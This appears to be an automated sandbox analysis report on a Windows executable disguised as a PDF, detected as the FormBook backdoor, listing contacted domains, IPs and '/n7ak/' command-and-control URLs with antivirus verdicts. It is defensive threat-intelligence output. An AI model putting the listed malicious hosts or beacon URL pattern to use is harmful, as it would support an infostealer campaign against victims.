C:\Users\user\Specification and Quantity Pdf.exe	66%	ReversingLabs	Win64.Backdoor.FormBook

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
www.jam-nins.com	11%	Virustotal	Browse
volkovastyu.com	5%	Virustotal	Browse
shops.myshopify.com	0%	Virustotal	Browse
www.supremeajock.biz	5%	Virustotal	Browse
www.1690.biz	6%	Virustotal	Browse
www.sdnaqianchuan.com	0%	Virustotal	Browse
www.volkovastyu.com	1%	Virustotal	Browse
www.tuktukwines.com	4%	Virustotal	Browse
www.maximsboutique.com	7%	Virustotal	Browse
www.parkpeninsula.online	8%	Virustotal	Browse
www.playdoapp.online	10%	Virustotal	Browse
www.taxuw.com	0%	Virustotal	Browse
www.ancientshadowguilt.space	1%	Virustotal	Browse
www.395boulderbrookdr.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://www.maximsboutique.comReferer:	0%	Avira URL Cloud	safe
https://api.msn.com:443/v1/news/Feed/Windows?t	0%	Avira URL Cloud	safe
http://www.taxuw.com/n7ak/www.jam-nins.com	100%	Avira URL Cloud	malware
http://www.tuktukwines.com/n7ak/www.playdoapp.online	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world	0%	Avira URL Cloud	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	Avira URL Cloud	safe
https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881	0%	Avira URL Cloud	safe
https://api.msn.com:443/v1/news/Feed/Windows?t	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	Virustotal		Browse
https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter	0%	Avira URL Cloud	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	Virustotal		Browse
http://www.395boulderbrookdr.com/n7ak/	0%	Avira URL Cloud	safe
http://www.tuktukwines.com/n7ak/www.playdoapp.online	6%	Virustotal		Browse
http://www.playdoapp.onlineReferer:	0%	Avira URL Cloud	safe
https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881	0%	Virustotal		Browse
https://excel.office.com	0%	Avira URL Cloud	safe
http://www.volkovastyu.com	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-	0%	Avira URL Cloud	safe
http://www.supremeajock.biz/n7ak/www.1690.biz	100%	Avira URL Cloud	malware
http://www.maximsboutique.com/n7ak/www.tuktukwines.com	100%	Avira URL Cloud	malware
https://deff.nelreports.net/api/repX	0%	Avira URL Cloud	safe
http://www.1690.biz/n7ak/	0%	Avira URL Cloud	safe
https://excel.office.com	0%	Virustotal		Browse
http://www.volkovastyu.com	1%	Virustotal		Browse
http://www.supremeajock.biz/n7ak/	100%	Avira URL Cloud	malware
http://www.395boulderbrookdr.com/n7ak/	1%	Virustotal		Browse
http://www.395boulderbrookdr.comReferer:	0%	Avira URL Cloud	safe
https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc	0%	Avira URL Cloud	safe
http://www.supremeajock.biz/n7ak/	5%	Virustotal		Browse
https://wns.windows.com/	0%	Avira URL Cloud	safe
http://www.gameofgem.com/n7ak/	0%	Avira URL Cloud	safe
http://www.1690.biz	0%	Avira URL Cloud	safe
http://www.ancientshadowguilt.space	0%	Avira URL Cloud	safe
http://www.1690.biz/n7ak/	1%	Virustotal		Browse
http://www.maximsboutique.com	100%	Avira URL Cloud	malware
http://www.playdoapp.online/n7ak/www.taxuw.com	0%	Avira URL Cloud	safe
http://www.playdoapp.online/n7ak/	0%	Avira URL Cloud	safe
http://www.ancientshadowguilt.space/n7ak/	0%	Avira URL Cloud	safe
http://www.ancientshadowguilt.space	1%	Virustotal		Browse
https://word.office.com	0%	Avira URL Cloud	safe
http://www.gameofgem.com/n7ak/	6%	Virustotal		Browse
http://www.thehandycrewcompany.com	0%	Avira URL Cloud	safe
http://www.playdoapp.online/n7ak/	8%	Virustotal		Browse
http://www.tuktukwines.com	0%	Avira URL Cloud	safe
http://www.ancientshadowguilt.space/n7ak/	1%	Virustotal		Browse
https://wns.windows.com/	0%	Virustotal		Browse
https://word.office.com	0%	Virustotal		Browse
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	Avira URL Cloud	safe
http://www.jam-nins.com/n7ak/www.sdnaqianchuan.com	0%	Avira URL Cloud	safe
http://www.goodstuff.tv/n7ak/	0%	Avira URL Cloud	safe
http://www.thehandycrewcompany.com	8%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark	0%	Avira URL Cloud	safe
http://www.tuktukwines.com	4%	Virustotal		Browse
http://www.sdnaqianchuan.com/n7ak/www.parkpeninsula.online	0%	Avira URL Cloud	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	Virustotal		Browse
http://www.tripskorea.com/n7ak/www.gameofgem.com	0%	Avira URL Cloud	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	Avira URL Cloud	safe
http://www.jam-nins.com/n7ak/www.sdnaqianchuan.com	14%	Virustotal		Browse
http://www.1690.biz	6%	Virustotal		Browse
http://www.goodstuff.tv/n7ak/	1%	Virustotal		Browse
https://outlook.com	0%	Avira URL Cloud	safe
http://www.parkpeninsula.online	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark	0%	Virustotal		Browse
http://www.sdnaqianchuan.comReferer:	0%	Avira URL Cloud	safe
http://www.thehandycrewcompany.comReferer:	0%	Avira URL Cloud	safe
http://www.parkpeninsula.onlineReferer:	0%	Avira URL Cloud	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	0%	Avira URL Cloud	safe
http://www.parkpeninsula.online	8%	Virustotal		Browse
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	0%	Avira URL Cloud	safe
https://outlook.com	0%	Virustotal		Browse
http://www.ancientshadowguilt.spaceReferer:	0%	Avira URL Cloud	safe
http://www.maximsboutique.com/n7ak/	100%	Avira URL Cloud	malware
http://www.goodstuff.tv	0%	Avira URL Cloud	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	Virustotal		Browse
https://api.msn.com/v1/news/Feed/Windows?	0%	Avira URL Cloud	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	0%	Virustotal		Browse
http://www.jam-nins.com	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua	0%	Avira URL Cloud	safe
http://www.tuktukwines.com/n7ak/?OrT4vp=D48xOFEPf6J&nrCxNDk=X95XYDcr/0ovQl8dFDDB2DmtDdbecE+v1errdqyRv2syAHM7RuOPKheDNorHxKs8v8dmbSYlDw==	0%	Avira URL Cloud	safe
https://api.msn.com/v1/news/Feed/Windows?	0%	Virustotal		Browse
http://www.taxuw.comReferer:	0%	Avira URL Cloud	safe
http://www.jam-nins.comReferer:	0%	Avira URL Cloud	safe
http://www.goodstuff.tv	1%	Virustotal		Browse
http://www.maximsboutique.com/n7ak/	5%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT	0%	Avira URL Cloud	safe
https://www.pollensense.com/	0%	Avira URL Cloud	safe
http://www.jam-nins.com	11%	Virustotal		Browse
http://www.thehandycrewcompany.com/n7ak/	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi	0%	Avira URL Cloud	safe
http://www.volkovastyu.comReferer:	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.jam-nins.com	203.161.60.191	true	true	11%, Virustotal, Browse	unknown
volkovastyu.com	78.46.88.140	true	true	5%, Virustotal, Browse	unknown
shops.myshopify.com	23.227.38.74	true	true	0%, Virustotal, Browse	unknown
www.ancientshadowguilt.space	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.1690.biz	unknown	unknown	true	6%, Virustotal, Browse	unknown
www.parkpeninsula.online	unknown	unknown	true	8%, Virustotal, Browse	unknown
www.tuktukwines.com	unknown	unknown	true	4%, Virustotal, Browse	unknown
www.395boulderbrookdr.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.sdnaqianchuan.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.supremeajock.biz	unknown	unknown	true	5%, Virustotal, Browse	unknown
www.playdoapp.online	unknown	unknown	true	10%, Virustotal, Browse	unknown
www.volkovastyu.com	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.maximsboutique.com	unknown	unknown	true	7%, Virustotal, Browse	unknown
www.taxuw.com	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.tuktukwines.com/n7ak/?OrT4vp=D48xOFEPf6J&nrCxNDk=X95XYDcr/0ovQl8dFDDB2DmtDdbecE+v1errdqyRv2syAHM7RuOPKheDNorHxKs8v8dmbSYlDw==	true	Avira URL Cloud: safe	unknown
http://www.tuktukwines.com/n7ak/	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
www.playdoapp.online/n7ak/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#	Specification and Quantity Pdf.exe, Specification and Quantity Pdf.exe.0.dr	false	URL Reputation: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?t	explorer.exe, 00000008.00000002.3754644999.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1317815671.0000000007276000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.maximsboutique.comReferer:	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tuktukwines.com/n7ak/www.playdoapp.online	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	6%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.taxuw.com/n7ak/www.jam-nins.com	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world	explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881	rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1557665455.0000000005EF0000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter	explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.395boulderbrookdr.com/n7ak/	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.playdoapp.onlineReferer:	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.volkovastyu.com	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 00000008.00000000.1337456269.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3762420609.000000000C091000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-	explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.supremeajock.biz/n7ak/www.1690.biz	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.maximsboutique.com/n7ak/www.tuktukwines.com	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://deff.nelreports.net/api/repX	explorer.exe, 00000008.00000002.3757784608.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1323539837.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081808656.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.1690.biz/n7ak/	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.supremeajock.biz/n7ak/	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	5%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.395boulderbrookdr.comReferer:	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc	explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wns.windows.com/	explorer.exe, 00000008.00000000.1323539837.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3074408098.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271985306.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3758469891.00000000090F2000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.gameofgem.com/n7ak/	explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	6%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.1690.biz	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	6%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.ancientshadowguilt.space	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.playdoapp.online/n7ak/www.taxuw.com	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.maximsboutique.com	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.playdoapp.online/n7ak/	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	8%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.ancientshadowguilt.space/n7ak/	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#	Specification and Quantity Pdf.exe, Specification and Quantity Pdf.exe.0.dr	false	URL Reputation: safe	unknown
https://word.office.com	explorer.exe, 00000008.00000000.1337456269.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3762420609.000000000C091000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://mozilla.org0/	rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.thehandycrewcompany.com	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	8%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.tuktukwines.com	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.jam-nins.com/n7ak/www.sdnaqianchuan.com	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	true	14%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.goodstuff.tv/n7ak/	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark	explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.sdnaqianchuan.com/n7ak/www.parkpeninsula.online	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tripskorea.com/n7ak/www.gameofgem.com	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://outlook.com	explorer.exe, 00000008.00000000.1337456269.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3762420609.000000000C091000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.parkpeninsula.online	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	8%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.parkpeninsula.onlineReferer:	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sdnaqianchuan.comReferer:	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thehandycrewcompany.comReferer:	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z	Specification and Quantity Pdf.exe, Specification and Quantity Pdf.exe.0.dr	false	URL Reputation: safe	unknown
